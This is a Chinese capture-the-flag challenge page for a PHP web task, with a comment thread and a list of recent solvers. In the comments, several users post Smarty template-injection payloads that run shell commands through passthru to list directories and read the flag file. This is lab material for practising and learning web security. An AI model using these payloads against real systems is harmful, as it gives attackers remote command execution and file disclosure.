聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 2923
提  示:
描  述:
聪明的php
评论
s1amese 11月前

/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}

回复 0

s1amese 11月前

passthru执行函数查看(ls),然后再查看列出的数字文件

回复 0

gleason 1年前

index.php?a={{passthru('more ../../../*|grep ff')}}

回复 0

Whittebz 1年前

{lf passthru("tac /_*")}{/if}

回复 0

Vio1et 1年前

哪位大神告诉我为什么{var_dump(`ls`)}不行

回复 0

zdfy005 1年前

https://blog.csdn.net/m_de_g/article/details/120380488

回复 3

aWxvdmVjdGY 1年前

?xxx={if passthru("less /_21752 ")}{/if}

回复 0

笨笨笨蛋 1年前

大佬们 你们都是怎么发现是什么模块注入的?TAT我好菜啊~~

回复 3
kaikaixinxin 10月前

随便传了个参数,就回显了php代码

回复 0

websterchan 1年前

小猿搜题

回复 9

lysandria 1年前

奇怪,tac不行,tail等可以。

回复 0

miko 2年前

smarty模板注入 看正则过滤内容 在最后查看flag的时候可以试试sort工具

回复 0

WriteUp

image
midi

3 金币

评分(11)

解题动态

coolsword2023 攻破了该题 2天前
18993762527 攻破了该题 3天前
yijueo 攻破了该题 4天前
18347019165 攻破了该题 4天前
15764725014 攻破了该题 4天前
donbrothers 攻破了该题 5天前
下雨天y 攻破了该题 6天前
Sinon 攻破了该题 7天前
18956160518 攻破了该题 8天前
花椒和邻居 攻破了该题 8天前
2183919422 攻破了该题 9天前
toto 攻破了该题 9天前
0xSec 攻破了该题 9天前
15181405972 攻破了该题 10天前
jadxbug 攻破了该题 10天前
smile123 攻破了该题 11天前
种花家十号 攻破了该题 11天前
2406044613 攻破了该题 11天前
gl 攻破了该题 11天前
r1st 攻破了该题 12天前